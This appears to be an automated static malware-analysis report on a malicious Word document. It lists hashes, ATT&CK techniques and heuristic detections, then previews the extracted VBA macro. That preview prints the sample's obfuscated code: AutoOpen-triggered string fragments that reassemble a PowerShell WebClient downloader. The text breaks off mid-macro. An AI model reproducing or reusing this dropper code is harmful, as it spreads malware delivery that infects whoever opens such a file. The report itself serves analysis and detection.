Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c0f716d986545de5…

MALICIOUS

Office (OLE)

213.0 KB Created: 2017-12-27 19:34:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: c78f532ad5cc9a1c708aef338d934ad2 SHA-1: 20e8bfcbb2247f95699c826e4309a8b447fe9697 SHA-256: c0f716d986545de519029f1ae243d200835ba25e82ba1911617074f1bb3ffe16
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, which is a critical finding, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0', suggesting a phishing lure designed to drop further malware. The AutoOpen macro and legacy WordBasic markers also point to malicious intent.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 79917 bytes
SHA-256: 3037242db1fae0a8f894a584b846c55486d09af864e69a55e69e9fec849c1a4c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XXbfpXqwBzvIz"
Function tiYwHYBfwouWb()
On Error Resume Next
aQKOVIN = 871 / Rnd(4) + FRjZrVrTioYccj + pYnZWzNGOYD * 9 + Int(WNVsIoZ * CStr(pvjiPNLi)) + nhiVTsLCVZzrL * CDate(3624 - 352183467 * 84 / 475) / AoVVGJwPoC - CSng(620)
mSvjJowjMj = 871 / Rnd(4) + nWIBlDO + FWbcCJHFbMPkWc * 9 + Int(zwmViJLa * CStr(WkaiNFVwFhD)) + VMGfFWlEiJiL * CDate(3624 - 352183467 * 84 / 475) / KEwikpuv - CSng(620)
jfXEp = Mid("5WBwzjTqLcSAkk'+'vte+vteR7qOjjwwUnQC79sNu", 13, 12)
bIaaqL = 871 / Rnd(4) + qtsIJIojQbr + fDVJpnPcPi * 9 + Int(fqusFVsXsft * CStr(wTtMQIIutJT)) + RkzGcZaMMTMSO * CDate(3624 - 352183467 * 84 / 475) / jOXEwplaW - CSng(620)
wOrWEvapzdE = 871 / Rnd(4) + szcntQfnJKClhi + zhWYoWcMsQudCJ * 9 + Int(IfJNmmcW * CStr(TqqokKbKhzBCjo)) + YQkjXzndiCBWb * CDate(3624 - 352183467 * 84 / 475) / rGWKZFzjn - CSng(620)
cXavYiMRHA = 871 / Rnd(4) + wbwTHjhWXEaUV + vTEhQfGazzZu * 9 + Int(pKiErNIKAa * CStr(FclpvJqP)) + lIfkEKrkVdwuM * CDate(3624 - 352183467 * 84 / 475) / rMtAjGMb - CSng(620)
VCtmjth = Mid("LJQcUSwwZEY38aC4QtuNvte+vteuvte+vteas = vte+vteSvte+'+'vteu5envi2S+i2Ste+i2S+i2Svtevvte+vtei2S+i2S:vte+vtepublivte+vtec'+'vte+vt'+'e vte+vte+vte+v'+'te Uz9gKaUvte+v'+'tez9 vte+vte+ Su5i2S+i2Skaravzd5MkZO", 21, 175)
UvBorTtcz = 871 / Rnd(4) + ipkvCIFYrWp + CtzwfNLmjo * 9 + Int(rpsirKiprcIBhP * CStr(aWzciEdVEdKaZ)) + UAttpsFKdNOI * CDate(3624 - 352183467 * 84 / 475) / zutrRjnnppGJ - CSng(620)
bsdIYoaa = 871 / Rnd(4) + YjEvwXwrtNtl + RkACMbWzijE * 9 + Int(RZckwNTO * CStr(kHMjaasJzCIwv)) + UHdpsHktDAn * CDate(3624 - 352183467 * 84 / 475) / wVGwAaXohco - CSng(620)
obzYwiUXcfG = 871 / Rnd(4) + NUnAjjJFWcPHsW + PsjOVYfbKltr * 9 + Int(wfKnkuflWchi * CStr(abSikZNBXwGrnW)) + tdOnsXJrRcXz * CDate(3624 - 352183467 * 84 / 475) / BsQCkWzEIjBTi - CSng(620)
jubuKLiBT = Mid("sn8fjNnMEsya.cvti2S+i2Se+vteomvte+vte/vte+vteV8vte+'+'vte8bOR2RSfkaWwPstvzu", 11, 49)
jJnFLYci = 871 / Rnd(4) + lBiqfdvJVt + cTYbGCqD * 9 + Int(svbWCCBi * CStr(HzsTHDqduOZ)) + iJENidc * CDate(3624 - 352183467 * 84 / 475) / RlrYcdqZHnccNi - CSng(620)
LcVikLljkJ = 871 / Rnd(4) + PSrOKDHRVVsq + VPJOXsiuOW * 9 + Int(SCCkAuh * CStr(ZNGwNnoKvlH)) + AzWwSwF * CDate(3624 - 352183467 * 84 / 475) / JHlAvpwHBXQa - CSng(620)
XGoLwt = 871 / Rnd(4) + wPJLUkdIb + HOlXIYZZjJV * 9 + Int(TqiNQWG * CStr(zrwuIwURHOoc)) + uVOECwODC * CDate(3624 - 352183467 * 84 / 475) / ZtpvShHTGBq - CSng(620)
YEanokn = Mid("5d4J0tV7s6SAtcranc.Dvte+vteownlovte+vteadFii2S+i2Svte+vte'+'lvte+vtee(vte+vteSu5abc.vte+vteTovte+vteStvt'+'e+i2S+i2Svtervte+vESRYhnlw", 15, 111)
ThWLGJi = 871 / Rnd(4) + RRLPSvajhmJGT + SjGRCpw * 9 + Int(RbFBXrjJY * CStr(hPjiKhzCfz)) + VcucodbvFOl * CDate(3624 - 352183467 * 84 / 475) / zzjJRYjDYOoZD - CSng(620)
kAwXNrCLCa = 871 / Rnd(4) + hbiqYqoazu + GrtoqMUD * 9 + Int(NoVPYIqbBARQo * CStr(wFXCcshn)) + tcFwHYd * CDate(3624 - 352183467 * 84 / 475) / XbCGtGPSQAMY - CSng(620)
Akboj = 871 / Rnd(4) + kVYSAJwqv + LZjNEOSGvZkibX * 9 + Int(dwvDHnUYWtGW * CStr(NbrIDkwroVwJv)) + dihCtBjWNCno * CDate(3624 - 352183467 * 84 / 475) / qBMUwsit - CSng(620)
pvIcYdH = Mid("jevte+vte-Itevte+vtem(Si2S+iSik1LDEslo08PjSAV5su3l63MD", 2, 27)
NfztjV = 871 / Rnd(4) + cuRiziTJsKJaic + TJiDYPtplCDz * 9 + Int(kLsUOJQh * CStr(QKpKbiQtjKicw)) + SJAhjFjf * CDate(3624 - 352183467 * 84 / 475) / jKZhSoLZLEjtYO - CSng(620)
TwkTmV = 871 / Rnd(4) + HSpjQdi + vTaQrTOU * 9 + Int(cYmnwuF * CStr(mWICGAHrMYUn)) + LTORjFhq * CDate(3624 - 352183467 * 84 / 475) / vWzULdVOL - CSng(620)
zmOBkW = 871 / Rnd(4) + nPYsWtUfl + aLOchcH * 9 + Int(QFzCzwFUkSYS * CStr(tultUjnJA)) + fndscwzic * CDate(3624 - 352183467 * 84 / 475) / IHIPlRanBI - CSng(620)
EVWWJhuhiuC = Mid("IDff6 (('(('+'i2S . ( Q0reNv:COmsPec[4,15,25]-joinvtevte) ((vteSu5franv'+'te+vt'+'ec = new-obvte+vtejecvi2S+i2Ste+vtet vte+vteSystem.Nevte+i2S+JiW3zFO7i6Lrid20QmwsLt
... (truncated)